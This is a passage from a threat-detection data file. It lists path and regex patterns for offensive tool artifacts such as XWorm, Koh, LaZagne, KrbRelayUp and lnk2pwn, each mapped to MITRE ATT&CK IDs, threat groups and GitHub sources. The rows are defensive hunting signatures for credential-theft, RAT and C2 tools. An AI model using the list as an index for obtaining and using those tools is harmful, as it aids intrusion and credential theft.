T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\KillWindows.pdb*",".{0,1000}\\KillWindows\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 
- TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\Kirby.ps1*",".{0,1000}\\Kirby\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\kitten.exe*",".{0,1000}\\kitten\.exe.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*\KittyStager*",".{0,1000}\\KittyStager.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2.
It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*\Koh.exe*",".{0,1000}\\Koh\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*\Koh.pdb*",".{0,1000}\\Koh\.pdb.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*\Koh\Koh.*",".{0,1000}\\Koh\\Koh\..{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*\Koppeling.sln*",".{0,1000}\\Koppeling\.sln.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*\KPortScan 3.0\*",".{0,1000}\\KPortScan\s3\.0\\.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","0","N/A","8","1","3","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z" "*\KPortScan\*",".{0,1000}\\KPortScan\\.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","0","N/A","8","1","3","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z" "*\krb5\*.py",".{0,1000}\\krb5\\.{0,1000}\.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*\KrbRelay.exe*",".{0,1000}\\KrbRelay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\KrbRelayUp.exe*",".{0,1000}\\KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\KrbRelayUp.lib*",".{0,1000}\\KrbRelayUp\.lib.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*\KrbSCM.cs*",".{0,1000}\\KrbSCM\.cs.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*\KRBUACBypass*",".{0,1000}\\KRBUACBypass.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","444","60","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "*\kuhl_m_sekurlsa.c*",".{0,1000}\\kuhl_m_sekurlsa\.c.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS 
process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*\Ladon.exe*",".{0,1000}\\Ladon\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*\Ladon.ps1*",".{0,1000}\\Ladon\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*\laps.py*",".{0,1000}\\laps\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\LAPSDumper\*",".{0,1000}\\LAPSDumper\\.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","238","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" 
"*\lastpass\getCredslastpassEntries.h*",".{0,1000}\\lastpass\\getCredslastpassEntries\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\lastpass\getCredslastpassMasterPass.h*",".{0,1000}\\lastpass\\getCredslastpassMasterPass\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\lastpass\getCredslastpassMasterUsername.h*",".{0,1000}\\lastpass\\getCredslastpassMasterUsername\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\lateral_wmi.py*",".{0,1000}\\lateral_wmi\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*\lazagne.exe*",".{0,1000}\\lazagne\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation 
tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\LaZagne.py*",".{0,1000}\\LaZagne\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\lazagne.zip*",".{0,1000}\\lazagne\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\ldap_search_bof.py*",".{0,1000}\\ldap_search_bof\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*\ldap-checker.py*",".{0,1000}\\ldap\-checker\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\ldapper.py*",".{0,1000}\\ldapper\.py.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","0","N/A","7","1","87","9","2022-09-30T23:28:28Z","2020-06-17T16:53:35Z" 
"*\LDAPPER-master*",".{0,1000}\\LDAPPER\-master.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","0","N/A","7","1","87","9","2022-09-30T23:28:28Z","2020-06-17T16:53:35Z" "*\ldapph.db*",".{0,1000}\\ldapph\.db.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*\ldap-search.py*",".{0,1000}\\ldap\-search\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\ldapsearch-ad.py*",".{0,1000}\\ldapsearch\-ad\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\LdrLockLiberator.c*",".{0,1000}\\LdrLockLiberator\.c.{0,1000}","offensive_tool_keyword","LdrLockLiberator","LdrLockLiberator is a collection of techniques for escaping or otherwise forgoing Loader Lock while executing your code from DllMain or anywhere else the lock may be present.","T1574.002 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/ElliotKillick/LdrLockLiberator","1","0","N/A","9","4","313","55","2024-04-28T21:16:21Z","2023-10-31T10:11:16Z" "*\LdrLockLiberatorWDK.c*",".{0,1000}\\LdrLockLiberatorWDK\.c.{0,1000}","offensive_tool_keyword","LdrLockLiberator","LdrLockLiberator is a collection 
of techniques for escaping or otherwise forgoing Loader Lock while executing your code from DllMain or anywhere else the lock may be present.","T1574.002 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/ElliotKillick/LdrLockLiberator","1","0","N/A","9","4","313","55","2024-04-28T21:16:21Z","2023-10-31T10:11:16Z" "*\letmein.ps1*",".{0,1000}\\letmein\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\lfs_injection.exe*",".{0,1000}\\lfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\liblsarelay.dll*",".{0,1000}\\liblsarelay\.dll.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*\liblsarelayx.dll*",".{0,1000}\\liblsarelayx\.dll.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential 
Access","https://github.com/CCob/lsarelayx","1","0","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*\LibSnaffle*",".{0,1000}\\LibSnaffle.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","Discovery","https://github.com/Group3r/Group3r","1","0","AD Enumeration","7","6","592","55","2024-03-19T03:08:39Z","2021-07-05T05:05:42Z" "*\Lime-Crypter.sln*",".{0,1000}\\Lime\-Crypter\.sln.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","0","N/A","9","5","445","192","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z" "*\Lime-Crypter\*",".{0,1000}\\Lime\-Crypter\\.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","0","N/A","9","5","445","192","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z" "*\LinikatzV2\*",".{0,1000}\\LinikatzV2\\.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","N/A","10","2","125","13","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z" "*\LiveMicrophone.dll*",".{0,1000}\\LiveMicrophone\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\lnk_parser_cmd.exe -r *",".{0,1000}\\lnk_parser_cmd\.exe\s\-r\s.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Lnk2Pwn.java*",".{0,1000}\\Lnk2Pwn\.java.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*\Lnk2PwnFrame.java*",".{0,1000}\\Lnk2PwnFrame\.java.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*\lnk2pwn-master*",".{0,1000}\\lnk2pwn\-master.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - 
TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","1","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*\lnkbomb.py*",".{0,1000}\\lnkbomb\.py.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","10","3","282","55","2022-12-25T19:33:18Z","2022-01-03T04:17:11Z" "*\lnkbomb-1.0\*",".{0,1000}\\lnkbomb\-1\.0\\.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","10","3","282","55","2022-12-25T19:33:18Z","2022-01-03T04:17:11Z" "*\Lnk-Sweeper.ps1*",".{0,1000}\\Lnk\-Sweeper\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Lnk-Sweeper.txt*",".{0,1000}\\Lnk\-Sweeper\.txt.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - 